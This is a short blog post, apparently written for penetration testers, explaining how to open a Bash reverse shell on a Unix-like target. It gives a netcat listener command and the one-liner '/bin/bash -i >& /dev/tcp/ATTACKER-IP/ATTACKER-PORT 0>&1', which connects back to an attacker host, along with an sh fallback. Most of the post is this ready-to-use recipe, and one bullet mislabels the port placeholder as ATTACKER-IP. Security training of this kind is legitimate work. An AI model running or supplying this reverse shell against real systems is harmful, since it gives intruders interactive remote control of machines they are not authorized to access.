In this post I will talk about a special type of reverse shell, I like this type of shell because mostly you can use tools already exist on your target.
But before start talking about Bash Reverse Shell in details, I would like to mention some limitations about this type of shell:
- You can’t use this type of shell against Windows targets since bash is not there.
- You can’t use this type of shell if the Unix-Like target do not have the Bash package installed. However you can use the ancient Bourne shell (sh).
Now All you have to do is to setup a nc listener on your attacking machine.
nc -nlvp PORT
Then Issue this command on your target.
/bin/bash -i >& /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
where :
- ATTACKER-IP is your attacking machine IP address
- ATTACKER-IP is port used by nc listener
And that’s ! you should have a bash reverse shell by now, This reverse shell was created thanks to Bash capabilities and Unix-Like File descriptor handler.
You can replace /bin/bash by /bin/sh if the target machine lack bash package.
Final Thoughts:
As always you have to enumerate your target to know the environment in front of you. In our case you have to check for Bash or Sh existence and located where.
this post serve as a short note on how to create a Bash reverse shell, please read more about the software or technology used in references.
Regards,
Fahad.
references:
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://en.wikipedia.org/wiki/File_descriptor
- http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO-3.html
- https://en.wikipedia.org/wiki/Unix_shell